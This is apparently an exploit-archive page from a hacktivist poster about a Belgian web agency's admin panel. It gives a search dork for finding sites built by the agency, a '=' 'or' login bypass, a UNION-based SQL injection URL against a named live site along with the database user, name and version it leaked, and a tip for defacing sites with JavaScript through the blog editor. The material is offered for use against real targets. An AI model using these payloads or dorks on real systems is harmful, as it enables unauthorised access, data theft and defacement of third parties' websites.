Belgium Panel Admin Bypass JSDeface & SQLi

2018.06.11

Informacion - Anonymous (CO)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Design & development by Digital Productions"

@ Title: Belgium Panel Admin Bypass JSDeface & SQLi

@ Date: 09.06.2018

@ Vendor: http://www.digital-productions.be/

@ Author: Informacion - Anonymous

@ Dork: intext:"Design & development by Digital Productions"

@ P0c: http://www.dataskills.be/admin

# '=' 'or' user & pass :)

# SQLI: /admin/blog-aanpassen.php?id=4' [SQLi]

# site.com/admin/blog-aanpassen.php?id=.4' +UNION+ALL+SELECT+1,2,3,4,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),6,7,8,9,10,11,12-- -data@localhost : dataskills_admin : 10.0.32-MariaDB-0+deb8u1

@ Tutorial: Deface JS in the eyelash "Blog" add new and deface JS, good luck :).
################################################################################################

References:

https://www.facebook.com/Informacion-Anonymous-611394289006994/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Belgium Panel Admin Bypass JSDeface & SQLi

Dork: intext:"Design & development by Digital Productions"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.